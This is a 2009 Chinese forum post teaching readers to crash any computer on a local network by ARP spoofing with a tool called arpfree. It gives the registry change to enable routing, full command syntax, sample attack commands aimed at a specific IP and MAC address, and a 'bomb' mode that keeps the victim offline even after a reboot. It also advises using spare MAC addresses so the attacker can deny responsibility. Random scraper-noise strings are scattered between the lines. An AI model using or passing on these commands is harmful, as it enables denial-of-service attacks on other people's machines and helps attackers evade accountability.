下沙论坛
标题:
让局域网内任何一台电脑死机!
[打印本页]
作者:
秋风舞落叶
时间:
2009-11-26 10:26
标题:
让局域网内任何一台电脑死机!
本帖最后由 秋风舞落叶 于 2009-11-26 22:08 编辑
; @- g3 b: Z( R9 c8 ?
9 S/ A: P8 v& e
事先声明,如果出了什么问题,可别找我哦 祝你们好运。提示:准备两个MAC地址,这样就算找到你不承认就OK了,IP是随时可以换的,MAC可不是随便换的哦!
4 B- j! ?' ~; @
教你让内网任何一台电脑死机,如果你有大量的计算机效果更好!
2 \1 j! J' ~5 P: I0 ~
开始忘记说了,要使用ARP欺骗,必须启动ip路由功能,修改(添加注册表选项:
3 a+ b3 u, t2 q2 Y' D) A' z
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\IPEnableRouter = 0x1
$ l. T: Y6 o% }& }) q5 D) R1 N
有的朋友发现打开网卡失败,原因可能就是这个.
6 V( L* L3 Z+ n( E9 }; v6 }
发送的时候可以选择ARP的TYPE。如果是ARP请求报文,则只要输入要问的IP地址
' \* {% S# O, v
如果是ARP应答报文则要输入发送端的IP以及对方询问MAC地址对应的IP地址
% E' C, h# P0 E- G0 ^& U0 d
最后的发送速度可选参数为:(大小写敏感..我觉得挺不好的)
4 G) R' @( M) m$ |/ N+ K
fast----------最快
; {" ^( b. \* o5 v
hear---------每60MS一个包(可能是比较适合结合SNIFFER做监听)
( d. t% z- L, m* t
slowhear---每500MS一个包
& X# q: K/ U' \- s& h
auto---------每1秒一个包
! N: B. f( F; o q# z v
slow---------每2秒个包
g) [0 Q* t# B- ]+ k2 a( L
使用方法如下:
& W/ {! M4 z* z6 [$ l
***********************************************************************
! Z. ]" r2 v7 l3 ?
* (1)Send arp packet in "request mode" Examples:
4 T4 h1 o; V* I: L, s2 H1 b
* arpfree 0050fc272b26 000b6af80ca8 request 1.1.1.1 fast
+ q8 ~+ |* e7 A& s
* | | | | |
4 {+ Y+ m( p6 \6 L8 U
* your mac address | | | |
6 `; w- Z* N2 A" {$ j
* destnation mac | | speed
9 l& H6 Z6 L! U! O
* arp type |
$ T/ t A/ m% Z; D1 A
* |
/ g$ g, {+ k& ^
* your ip address
% _" u# X. k& m
***********************************************************************
' I. ^3 T- O& f+ W' @! B. i; R
* (2)Send arp packet in "reply mode" Examples:
: D0 k) a) _) c6 b; p& n
* arpfree 0050fc272b26 000b6af80ca8 reply 1.1.1.1 2.2.2.2 auto
' f6 p0 t, m% e
* | | | | | |
0 F( M) l1 Y# z* G
* your mac address | | | | |
7 E! \* ]1 h; B
* destnation mac | | | speed
, a7 T: f1 J. J* M! n
* arp type | |
7 W: B+ b- E; ^8 H2 u
* | |
0 y( c' i; L! v
* your ip address |
^1 B: S4 E B4 E; I+ H5 y. g6 D
* |
9 ] P! M* O* _3 {( a6 B7 F2 Q
* the ip address of destnation mac
$ x3 o) J/ w! r+ Q8 \
***********************************************************************
. i; E# U( v' N5 o& g: O" K
补充:反击“LAN终结者”的办法:
( \- W% F2 a2 Q V
反击“终结者”有几个办法:
# A5 H# T, ~; L1 J1 D
1:发动比他更强烈的攻击:
" B2 d8 A/ p9 M9 p7 F
arpfree 123412341234 ffffffffffff request 192.168.237.58 fast
- J- D. x5 N5 V4 Q' |! |0 z, i
|
8 Y( q( _' x# s7 u: R% n# h" @ R
|
) q$ U9 K4 D. B5 }9 t# k
这里是你想攻击的人的IP地址
3 \3 e2 s* j1 ~! G+ U& V/ {
2:交换机竞争:
' Q! q5 T) l0 o* L6 K" H, C2 Q
arpfree 00c04c395a3c 123412341234 request 1.1.1.1. fast
; S5 ^5 b" q# h d0 ]/ [$ Q2 r
|
+ p/ q2 K+ V9 q# L) [
|
( N; s5 H- t# o% X0 X
这里是你想攻击的人的MAC地址
% Y3 H( I) O Y& _1 u3 b) H
1:情况将导致他IP地址冲突(比“终结者”来的猛烈多了)
( t. M5 z( c) u* Q& \" h. `* l
2:情况将使得他无法连接网络由于交换机把他的流量都给你了)
( f$ c$ a& A+ r% D
———————————更-----新----消-----息—————————————————————
& g4 {7 L& H$ U2 c" v) X2 E
因为有朋友反映在非交换环境下,如使用HUB的情况下,无法对目标进行打击
/ F; N5 Q& \4 f% _
增加参数“bomb”,使用方法如下:
* M4 R+ ?" m7 S
假设,目标为IP:192.168.237.109 目标mac为:011a8575a436
5 c c1 c5 ]- K& E, G
攻击命令如下:
. Z0 x# B5 T; Z9 d1 w" y' m/ M
arpfree 123412341234 011a8575a436 reply 1.1.1.1 192.168.237.109 bomb
" X7 V3 O% [$ f( Q) }
其实就是进行简单的ARP DOS攻击,快速刷新目标的ARP缓存,可以在消耗自身较少系统资源的情况下
! E/ _; `2 B1 S/ N4 Q
造成和PDOS工具类似的效果,并且如果你不停止攻击,对方重启以后也无法正常进入系统
. j' H1 r9 J" m4 P" m
(当然前提是他没拔网线)。
欢迎光临 下沙论坛 (http://bbs.xiasha.cn/)
Powered by Discuz! X3.3